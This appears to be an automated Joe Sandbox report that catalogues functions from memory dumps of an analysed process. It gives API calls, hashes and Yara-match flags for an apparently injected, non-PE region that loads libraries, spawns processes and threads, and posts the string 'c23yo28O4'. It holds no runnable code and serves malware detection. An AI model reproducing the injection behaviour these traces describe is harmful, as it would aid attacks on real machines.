                                              • API String ID: 2994545307-0
                                              • Opcode ID: 305e06793d4c284b1aeb1460517276ab88116852329acfcf278a216cfae0240a
                                              • Instruction ID: f10490e609118dcaca8f4d41019c8cc962d8961048d07ea52ac362e51e9c3d12
                                              • Opcode Fuzzy Hash: 305e06793d4c284b1aeb1460517276ab88116852329acfcf278a216cfae0240a
                                              • Instruction Fuzzy Hash: 9390022135549506D150B19D58046164045B7E0215F59C025A4814595D865689556221
                                              Function 035B2F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 42bcbb02cfcca2850270701403a03c2f38aa6cb8b154a2f382d3202afb989624
                                              • Instruction ID: 745d6171044ee3393dc3e6f1424dc12b30e743d64a32cc2b64554a34697b8780
                                              • Opcode Fuzzy Hash: 42bcbb02cfcca2850270701403a03c2f38aa6cb8b154a2f382d3202afb989624
                                              • Instruction Fuzzy Hash: C790026135144846D100B1995814B060045D7E1315F59C019E5064555D871ACD526126
                                              Function 035B2FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: c68482fb09967a46feb1de65c1a8b151daedcc036ec32a0f8482562554b9e551
                                              • Instruction ID: a88433b67f8417e34f04ab38ae5d4b18fca0eea50dbb2be8eaed76a9c0e8468c
                                              • Opcode Fuzzy Hash: c68482fb09967a46feb1de65c1a8b151daedcc036ec32a0f8482562554b9e551
                                              • Instruction Fuzzy Hash: 7E900221321C4446D200B5A95C14B07004597D0317F59C119A4154555CCA1689615521
                                              Function 035B2FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b699595d3cf8bfb0f0788df1e49363320c26eae8feb3fdf69c9b1a33ae2e5e81
                                              • Instruction ID: d4beb81d6bd19ed07f1e8e4a6191bd5addb4ae08c68490509803559b9ddd2112
                                              • Opcode Fuzzy Hash: b699595d3cf8bfb0f0788df1e49363320c26eae8feb3fdf69c9b1a33ae2e5e81
                                              • Instruction Fuzzy Hash: A1900221711444464140B1A99C449064045BBE1225759C125A4998551D865A89655665
                                              Function 035B2EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d1be622d09a263530e4099143e077a01f79018be1e5a52f914f2fd7f363e502b
                                              • Instruction ID: 748f47a7b9d70b0fd568e33bbec2de4cbde520c032da486f3cdec2ef26b1e2e1
                                              • Opcode Fuzzy Hash: d1be622d09a263530e4099143e077a01f79018be1e5a52f914f2fd7f363e502b
                                              • Instruction Fuzzy Hash: 6790026131184807D140B5995C04607004597D0316F59C015A6064556E8B2A8D516135
                                              Function 035B2E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 21e79fc6babdebf98fc0e2ccf5e80f2ba24962216e1f80ad18d200e9ccf9c358
                                              • Instruction ID: 24ca78b1d31a6e9e37c8674a9b63d9524aed6ade0d7083858d04e5e6be49793b
                                              • Opcode Fuzzy Hash: 21e79fc6babdebf98fc0e2ccf5e80f2ba24962216e1f80ad18d200e9ccf9c358
                                              • Instruction Fuzzy Hash: 8490022171144906D101B1995804616004A97D0255F99C026A5024556ECB268A92A131
                                              Function 035B2D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: ecd5bc3eb6fb8326a7373d09e8c617ce10760db5e00d99a1237b2c4022456f78
                                              • Instruction ID: c253d7484745206b4c946d7f1eb7c1ee850703202794fee38cb7ea9daebe763f
                                              • Opcode Fuzzy Hash: ecd5bc3eb6fb8326a7373d09e8c617ce10760db5e00d99a1237b2c4022456f78
                                              • Instruction Fuzzy Hash: 2190022932344406D180B199680860A004597D1216F99D419A4015559CCA1689695321
                                              Function 035B2D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 4a6ffc2e80305f5d687ff3e082fe7836c0d378cde869dfbff2309f4b6817a4b9
                                              • Instruction ID: 62e0afc4dd32f56cc7758c4a69159f9e430abcaeb221bfd7e306fcae6d436c1e
                                              • Opcode Fuzzy Hash: 4a6ffc2e80305f5d687ff3e082fe7836c0d378cde869dfbff2309f4b6817a4b9
                                              • Instruction Fuzzy Hash: CC90022131144407D140B19968186064045E7E1315F59D015E4414555CDA1689565222
                                              Function 035B2DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 61181437ed9bd4702bbfbaa9726187aa8216e4c7782244de1f2005df8adde5c2
                                              • Instruction ID: a59f2b2e26b2c34b190652a137890af1d7293b43d6357c976b560ef488da7808
                                              • Opcode Fuzzy Hash: 61181437ed9bd4702bbfbaa9726187aa8216e4c7782244de1f2005df8adde5c2
                                              • Instruction Fuzzy Hash: 12900221352485565545F19958045074046A7E0255799C016A5414951C86279956D621
                                              Function 035B2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: daa6a1ae1e3ad5e08557657d19d5774e69f77fb4b1adb13dd37d9ae459fd7099
                                              • Instruction ID: d8017c051068bbcff615d4ea7332ac83c665e928209401c58a0bdcd0bc89ff63
                                              • Opcode Fuzzy Hash: daa6a1ae1e3ad5e08557657d19d5774e69f77fb4b1adb13dd37d9ae459fd7099
                                              • Instruction Fuzzy Hash: 1F90023131144817D111B1995904707004997D0255F99C416A4424559D97578A52A121
                                              Function 035B2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: b8ebb347d73298794ceaea4f2993cfc11fb3ff993e718ff0d9b74d8ae360bd33
                                              • Instruction ID: 2bb5b9daed95d68cffd239cdcedd7845b3dc7fd5816e38b553bf11495ed54915
                                              • Opcode Fuzzy Hash: b8ebb347d73298794ceaea4f2993cfc11fb3ff993e718ff0d9b74d8ae360bd33
                                              • Instruction Fuzzy Hash: 3B9002313114CC06D110B199980474A004597D0315F5DC415A8424659D879689917121
                                              Function 035B2C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: d04cebcd84baff2b50f6b64d5e611183fbd334f5cf7ea3687833156e06077e17
                                              • Instruction ID: aab363824d90f8858a6b1643b08d1a75081ec5e072060cc1c56dd1bf400e022f
                                              • Opcode Fuzzy Hash: d04cebcd84baff2b50f6b64d5e611183fbd334f5cf7ea3687833156e06077e17
                                              • Instruction Fuzzy Hash: A490023131144C46D100B1995804B46004597E0315F59C01AA4124655D8716C9517521
                                              Function 035B2CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3945847956.0000000003540000.00000040.00001000.00020000.00000000.sdmp, Offset: 03540000, based on PE: true
                                              • Associated: 0000000D.00000002.3945847956.0000000003669000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.000000000366D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000D.00000002.3945847956.00000000036DE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_3540000_sc.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: 9ca28f064b7e56b8a3e753cadcbdfa9f4ea0466e6f25d08675505565ae5a4fec
                                              • Instruction ID: ca31f4826053f5062bb45bb15b135da397da29946cdda3bc18246ca011082215
                                              • Opcode Fuzzy Hash: 9ca28f064b7e56b8a3e753cadcbdfa9f4ea0466e6f25d08675505565ae5a4fec
                                              • Instruction Fuzzy Hash: 1B90023131144806D100B5D96808646004597E0315F59D015A9024556EC76689916131
                                              Function 02E10899 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(c23yo28O4,00000111,00000000,00000000), ref: 02E1091D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID: c23yo28O4$c23yo28O4
                                              • API String ID: 1836367815-3151844675
                                              • Opcode ID: 199bca9edef88c59970d88bac423a258392ea39ca96883e262d508a7d4b97f45
                                              • Instruction ID: ed6cf825cf5c41fe9b826a8112bda47960e82bdc0e739aa2d655060bce2aca18
                                              • Opcode Fuzzy Hash: 199bca9edef88c59970d88bac423a258392ea39ca96883e262d508a7d4b97f45
                                              • Instruction Fuzzy Hash: FA11E171D802187AEB10A6A58C01FDF7B7C9F80B54F00D164FA047F2C4E6B866068BE5
                                              Function 02E108A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 57threadwindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • PostThreadMessageW.USER32(c23yo28O4,00000111,00000000,00000000), ref: 02E1091D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: MessagePostThread
                                              • String ID: c23yo28O4$c23yo28O4
                                              • API String ID: 1836367815-3151844675
                                              • Opcode ID: 51d4856bcf8676c74b1d4c1e0f6ca82df6d4eea107d6be192518fe8ecc719085
                                              • Instruction ID: 8fb8132e0332c44fa1e4e3b7fe19db782ca6ded5ed339bae96b64046aaa0a50f
                                              • Opcode Fuzzy Hash: 51d4856bcf8676c74b1d4c1e0f6ca82df6d4eea107d6be192518fe8ecc719085
                                              • Instruction Fuzzy Hash: D101C071D81258B6EB21A6A4CC02FDF7B7C9F80B54F10D064FA047F2C4E6B866068BE5
                                              Function 02E229D0 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                              • Sleep.KERNELBASE(000007D0), ref: 02E22A9B
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Sleep
                                              • String ID: net.dll$wininet.dll
                                              • API String ID: 3472027048-1269752229
                                              • Opcode ID: 8c1895dce7577b35cd101585fccee26026977adfe9907574c5cbb1eddb3a9c8d
                                              • Instruction ID: ba05045964de750ea03f72377fef23bde4e6833ca6fec54e222786ee619e694b
                                              • Opcode Fuzzy Hash: 8c1895dce7577b35cd101585fccee26026977adfe9907574c5cbb1eddb3a9c8d
                                              • Instruction Fuzzy Hash: E4317EB1640704BBD724DF64C880FE6BBA9FB88704F04961DFA5E5B285D770B648CBA0
                                              Function 02E1EA3A Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 102COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 02E1EA57
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Initialize
                                              • String ID: @J7<
                                              • API String ID: 2538663250-2016760708
                                              • Opcode ID: ed67ff773337331be56dc9dcadd9b5e27cbd2314a2ffe1d5e9ee4a6d8bf1d130
                                              • Instruction ID: 571d114451bd05f94fc3411a235bc03d035192e0b4315e51210ef2abe4f5c4ec
                                              • Opcode Fuzzy Hash: ed67ff773337331be56dc9dcadd9b5e27cbd2314a2ffe1d5e9ee4a6d8bf1d130
                                              • Instruction Fuzzy Hash: D53112B5A006099FDB10DFD8D880DEEB7B9FF88304F148559E906A7214D775AE45CBA0
                                              Function 02E1EA40 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                              Download Yara Rule
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 02E1EA57
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Initialize
                                              • String ID: @J7<
                                              • API String ID: 2538663250-2016760708
                                              • Opcode ID: f3d4f778165cee29adc144542244844d24cce62ffcaa787f12cf38d47d147647
                                              • Instruction ID: 278013eee77561c5d541ffd2bf757b62e13d930209dd6d48d0a4cb95a1e7c033
                                              • Opcode Fuzzy Hash: f3d4f778165cee29adc144542244844d24cce62ffcaa787f12cf38d47d147647
                                              • Instruction Fuzzy Hash: 643121B5A0060A9FDB10DFD8D880DEEB7B9FF88304B148559E906EB214D775EE05CBA0
                                              Function 02E14280 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E142F2
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: c446cb2edfd4bcdd7cc2d2bf9357a6dd86f30088194d3250fb6f131875f8d2ce
                                              • Instruction ID: a9968fb4d34e69bef5e8074ac1ff26bb50db91e1e023e7ed8a3e09d77c336c03
                                              • Opcode Fuzzy Hash: c446cb2edfd4bcdd7cc2d2bf9357a6dd86f30088194d3250fb6f131875f8d2ce
                                              • Instruction Fuzzy Hash: 91014CB6D4020DABDB14EBE4DC41FDEB3B89B54308F0082A4A90997281F630E648CB91
                                              Function 02E28230 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessInternalW.KERNELBASE(?,?,?,?,02E17B73,00000010,?,?,?,00000044,?,00000010,02E17B73,?,?,?), ref: 02E28293
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateInternalProcess
                                              • String ID:
                                              • API String ID: 2186235152-0
                                              • Opcode ID: 88006889519db2f206d6a55a04b8a83178616f5c207b086390c0bed3b7b43911
                                              • Instruction ID: 2b63e6d67e6ae3c9e32277cc4811a5ce86f2951deb72f128ca1a83d384fe1886
                                              • Opcode Fuzzy Hash: 88006889519db2f206d6a55a04b8a83178616f5c207b086390c0bed3b7b43911
                                              • Instruction Fuzzy Hash: 500192B2214548BBCB44DE99DC81EDB77AEAF8C754F418608BA0DE7241D630FD518BA4
                                              Function 02E14326 Relevance: 1.5, APIs: 1, Instructions: 41libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E142F2
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Load
                                              • String ID:
                                              • API String ID: 2234796835-0
                                              • Opcode ID: b0953560f6e97a0f6bf1c2106018207f46967e55517a7a0063b1d7662908e1d6
                                              • Instruction ID: 1dce780fa7fe33addc3de9b4300495f6633014c2f6077f516ceadbe442924673
                                              • Opcode Fuzzy Hash: b0953560f6e97a0f6bf1c2106018207f46967e55517a7a0063b1d7662908e1d6
                                              • Instruction Fuzzy Hash: CCF04C719401496FDB01CBB4CC80FEC77A0EF99308F40CB64E949972C1E630D646CB81
                                              Function 02E096B0 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E096F5
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: debbe1defbc2a0a60edf709aa0ce795cdcc4a88c06a3ce5740d8b4d5a77755be
                                              • Instruction ID: 83151d867fcfc761bc74860612773983aeab1f06673f2d4355a857d6719b6955
                                              • Opcode Fuzzy Hash: debbe1defbc2a0a60edf709aa0ce795cdcc4a88c06a3ce5740d8b4d5a77755be
                                              • Instruction Fuzzy Hash: 69F06D733C021476E22066A9AC42FDBB78DDB80B75F144429FB0DEB2C1D992B44586E4
                                              Function 02E096A8 Relevance: 1.5, APIs: 1, Instructions: 34threadCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E096F5
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CreateThread
                                              • String ID:
                                              • API String ID: 2422867632-0
                                              • Opcode ID: dc35aca0b3cc0b12db64b702e1deb827ab96de186467bbdccefdc4cefd7799c7
                                              • Instruction ID: 36b596da6e7bd0c34ad58435e37fb92e75a0e1935c39aecb329c43c9b7843980
                                              • Opcode Fuzzy Hash: dc35aca0b3cc0b12db64b702e1deb827ab96de186467bbdccefdc4cefd7799c7
                                              • Instruction Fuzzy Hash: 97F0E5733C461033E32066988C02F877A8D8F81774F248128F71CEF2C1D996B44586E5
                                              Function 02E281A0 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,89881559,00000007,00000000,00000004,00000000,02E13B56,000000F4,?,?,?,?,?), ref: 02E281DC
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FreeHeap
                                              • String ID:
                                              • API String ID: 3298025750-0
                                              • Opcode ID: 52387f6b391afa9524378a867dcb8953b33c653ce9c9427cc4ce448ed0c6e72c
                                              • Instruction ID: 1e69073a298b82fc42674de1f451b9bb06ed3c3fcedcc766321eccd41ae11e36
                                              • Opcode Fuzzy Hash: 52387f6b391afa9524378a867dcb8953b33c653ce9c9427cc4ce448ed0c6e72c
                                              • Instruction Fuzzy Hash: D3E06D716402157FD610EE58DC40FAB37ADDFC8710F008018F908A7241D630BC108BB9
                                              Function 02E28150 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RtlAllocateHeap.NTDLL(02E114B9,?,02E248AF,02E114B9,02E244F7,02E248AF,?,02E114B9,02E244F7,00001000,?,?,02E29A53), ref: 02E2818F
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocateHeap
                                              • String ID:
                                              • API String ID: 1279760036-0
                                              • Opcode ID: 9a337b64ec47390a7d24a68222b7cd939cb2c90c9cc0e486826a2a48bc497499
                                              • Instruction ID: 671ccbf5d3bf510a967faa5e10f99861a4c1d3cfeccdbaa5d4356527a0195a45
                                              • Opcode Fuzzy Hash: 9a337b64ec47390a7d24a68222b7cd939cb2c90c9cc0e486826a2a48bc497499
                                              • Instruction Fuzzy Hash: 75E065766442157FD610EE58DC81FAB73ADEFC8710F008419FA1CAB282C630B9118BB8
                                              Function 02E17BB0 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetFileAttributesW.KERNELBASE(?,?,?,?,000004D8,00000000), ref: 02E17BDC
                                              Memory Dump Source
                                              • Source File: 0000000D.00000002.3942451462.0000000002E00000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_13_2_2e00000_sc.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: 41ff8a621ba58417915266e834d991137c538ca29049dbfe4efb40ce6f7bfc50
